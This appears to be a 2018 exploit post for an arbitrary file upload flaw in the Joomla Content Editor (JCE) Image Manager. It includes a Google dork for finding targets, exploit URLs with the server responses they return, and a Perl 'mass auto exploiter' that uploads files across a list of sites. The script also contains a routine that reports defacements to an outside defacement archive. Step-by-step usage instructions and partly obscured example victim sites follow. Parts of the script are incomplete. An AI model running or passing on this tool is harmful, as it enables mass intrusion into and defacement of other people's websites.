#################################################################################
Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
Vendor Homepage : joomlacontenteditor.net
Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
Date : 23/05/2018
Exploit Risk : High
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla!® content easy...
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content form html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
#################################################################################
Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to a the following security vulnerabilities:
1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to
the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Affected JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT
This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one.
TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes =>
Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability.
One Attacker must execute with remote file upload code.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial
[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial
[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability
[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}
Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
or giving this error => {"result":null,"error":"No function call specified!"}
Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}
Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt
Auto Mass Exploiter Perl =>
[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
foreach $site(@TARGETS){
chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";
$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanıcılar\Mustafa\result\list.txt');
print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'
]
)->decoded_content;
if ($res =~ m/"error":false/i){
}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}
$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){
$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gönder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gönder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alınmadı !! \n";
}
}[/code]
How to use this code on your operating system like Windows ;
Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe
Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt
C:/Users/Your-Computer-Name/ cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl
site.txt
Waiting for Upload
Exploit Successful or Not
Finished
#################################################################################
Example Sites =>
aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":{"error":true,"result":""},"error":null}
sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}
bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team